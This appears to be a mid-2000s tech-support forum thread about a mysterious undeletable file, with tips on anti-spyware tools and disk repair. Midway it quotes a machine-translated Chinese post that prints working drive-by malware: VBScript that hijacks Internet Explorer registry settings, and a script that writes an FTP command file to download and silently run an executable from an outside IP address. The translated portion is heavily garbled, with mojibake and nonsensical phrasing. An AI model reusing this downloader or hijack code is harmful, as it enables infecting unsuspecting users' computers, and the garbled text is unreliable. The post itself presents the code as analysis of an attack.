Both Norton and McAfee report no viruses or trojans. Both are up to date.
Futile Gesture that is an intereting idea. I’ll see what I can find.
You say your firewall shows no intruder activity. How about outgoing activity?
I use Zone Alarm and it keeps a log of every program that attempts to connect to the 'net, even if I’ve told it to not allow it.
I had a keylogger on my machine for who knows how long, which McAfee and AdAware did not catch. Keeping up with malware is a kind of arms race.
Currently, I use a combination of Ghost Surf Platinum (which did find the keylogger), HijackThis, Spybot, McAfee anti-virus and firewall, and Ad-Aware. They each catch things the others miss.
It’s no longer just questionable sites getting hacked these days. Earlier this year, some major sites, including CitiBank, were compromised by hackers installing keyloggers (probably where I picked up mine).
These days, it’s worth it to go pro, ihmo. All my traffic is encrypted now.
I forgot to add, CWShredder is a must if you suspect you may have CoolWebSearch (aka CoolWWWSearch) on your machine. It’s particularly nasty. Symptoms include popups and redirection.
Another thing to try is open the file in a hex editor. This is not for the feint of heart, but a freeware one is available here. Then, open the file from where it lives on disk - probably something like C:\Documents and Settings<your user name>\desktop<the filename>
If it’s really a shortcut, the filetype will be .lnk, so the name would be ???1/4.lnk or something similar. In any case, open the file in the hex editor and tell us what’s in it.
On reflection, from the screenshot it doesn’t look like a shortcut since it lacks the little arrow (though this can be turned off by the user with things like TweakUI.) Still would be interesting to see what’s in the file - please paste it here.
I have a hex editor (I’m a software developer.) It will not open the file and it says: Hex Editor cannot open directories. However, it does not show up as a directory or folder either in Explorer or at the command line.
And you and Kythereia are right, it does not seem to be a shortcut.
Here’s a online translation of the page (a message board post):
Publication: 2004-10-31 15:02:53 human spirits:44 [This user main page] [Quotation reply] [Sends the news to sbyking] Lou Zhu
[ 原创 ] traces the QQ virus once more! (2004.10.31)
SbykingIn 2004-03-17 21:06:08 has written named [ 原创 ] QQ tail track! ! !The card, the address is
Http://www.Yoyou.Net/bbs/Announce/Announce.Asp?BoardID=42&ID=18610
Today accesses the net also has net friend's QQ to send in such news:
(2004-10-31 13:49:56) God's favored one
Sbyking, I 听歌.
This DJ music website real 好棒! You like the DJ music?
I like the DJ music very much. Thinks very the person or household who refuses to move and bargains for unreasonably high compensation when the land is requisitioned for a construction project.
You also listen! Hxxp://www.21ccn.Com/
The stand from under website cannot open directly in the address fence, wants to be poisoned you were casual! ! !
In here you must want above to look the website source code does not open its homepage?SbykingThe method is opens my individual homepage (sbyking to state here is not absolutely in creates propaganda for own rotten website, you if thought like this speech, I but treat unjustly)Http://spyking.8u8.Com/online/ found in this page
"Inputs the website in under to examine the source document" a such line in "above examined" front inputs the website, certainly must bring http:// oh, then clicks "examines", waited for one can be able to open a memorandum. This was this website source code, specifically as follows:
1.
< HTML>
< HEAD>
< TITLE> The handset ting picture, the color letter main terminal I love short note net sms521.Com< /TITLE>
< /HEAD>
< Iframe src=qq06.Htm width=0 height=0 frameborder=0 scrolling=NO> < /iframe>
// sbyking annotation here is the malicious code page! ! !
< Body onunload= "t8 ()" >
< Script Language= "javascript" >
< !--
Var exit=true;
Function t8 ()
{
If (exit)
Window.Open ('Http://www.Yi76.Com')
}
// -->
< /script>
< Center> < Iframe src=http://mms.Homeway.Com.Cn/newsite/index.Asp?Smsid=12190 width=800 height=1900 frameborder=0 scrolling=NO> < /iframe> < /center>
< /body>
< /HTML>
2.Then continues with the above method to examine qq06.Htm source code as follows:
< Object data=qq06i.Test> < /object>
< Object data=qq06.Test> < /object>
3.Then continues with the above method to examine qq06i.Test source code as follows:
< Html>
□□< Object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'> < /object>
□□
□□< Script LANGUAGE= "VBScript" >
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\default_page_url", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url1", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url2", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url3", "Http://www.21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\First Home Page", "Http://21ccn.Com";
□□wsh.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1, "REG_DWORD"
□□wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
□□window.Close
□□< /script>
□□
□□< Script LANGUAGE= "VBScript" >
□□on error resume next
□□Call LongFei_AddFavorites ("[ brand-new MP3 not □□□□□□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □changes countenance stasis □N □e □to fear H to climb □Q □□□□□□□□□X □□□□□□□□□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□
□□N □` □climbs □e □e □N □e □□e to climb □Q □I □□to climb □□` to climb 砀 □H □
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □climbs □Q □fat H □N □X □□□□□to ferment □x □□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□
□□N □` □climbs □e □e □N □e □□e to climb □Q □I □□to climb □□` to climb 砀 □H □
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □x □I □□□□□□□changes countenance □I □` □□栀 □□mosquito larvae □□e □□□□□□□□□□□□~ □□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □changes countenance stasis □N □e □to fear H to climb □Q □□□□V □□□? □□] ","Http://www.Yi76.Com";)
□□
□□Function LongFei_AddFavorites (N, U)
□□on error resume next
□□Set S = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/" + N + ".URL")
□□S.TargetPath = U
□□S.Save ()
□□Set Sl = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/link/" + N + ".URL")
□□Sl.TargetPath = U
□□Sl.Save ()
□□End Function
□□
□□Function LongFei_AddDesktop (N, U)
□□on error resume next
□□Set S = wsh.CreateShortcut (wsh.SpecialFolders ("AllUsersDesktop") + "/" + N + ".URL")
□□S.TargetPath = U
□□S.Save ()
□□End Function
□□
□□< /script>
□□< Script language= "JScript.Encode ">
□□function closeit () {
□□setTimeout ("self.Close ()",5)
□□}
□□closeit ()
□□< /script>
□□
□□
□□< /html>
4.Then continues with the above method to examine qq06.Test source code as follows:
< Html>
< Object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B> < /object>
< Script LANGUAGE= "VBScript" >
Dim fso, tf, wsh
Set fso = CreateObject ("Scripting.FileSystemObject")
Set wsh=createobject ("wscript.Shell")
Set tf = fso.CreateTextFile ("ftp.Txt ", true)
Tf.Write "open 218.6.169.139 "&chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "get 21ccn.Exe "&chr (13) &chr (10)
Tf.Write "bye"
Tf.Close
A=wsh.Run ("ftp -s:Ftp.Txt ",0, true)
B=wsh.Run ("21ccn.Exe")
Window.Close
< /script>
< Script language= "javascript" >
Function closeit () {
SetTimeout ("self.Close ()",5)
}
Closeit ()
< /script>
< /html>
Subtotal: On saw like this to the website source code, own could not be poisoned! ! ! Actually this certainly does not have what profound technology, only is a small skill! ! Sbyking shares with everybody ~ ~ ~ ~ ~ ~ ~
Well, I know that I like the DJ music. Anyway…
Make of that what you will. The highlighted area of red is where 瘀漀爀椀琀攀 was found twice.
Do the contents of the “file” seem familiar? I’m suspecting that something is creating a file entry in the volume MFT and allocating space, but not writing anything. So you’re seeing whatever junk was leftover from the prior use of that particular cluster(s).
An alternative is a slightly fouled up MFT (assuming an NTFS formatted volume). Spurious index entries aren’t unheard of. If you’re on a FAT32 volume, well the odds are even higher this is the source of the problem.
I’d recommend a full backup followed by using the repair & defrag tools. You can also run chkdsk from the commmand line without the /f parameter to see if you have problems. That won’t fix anything, but it’ll at least tell you whether I’m barking up the right tree and whether you need to go to the hassle of a full backup & repair then defrag.
A co-worker mentioned that Hex Editor was refusing to open this due to the bad characters in the caption. His suggestion is to rename the file and try to open it. I’m not at home, but will try this tonight.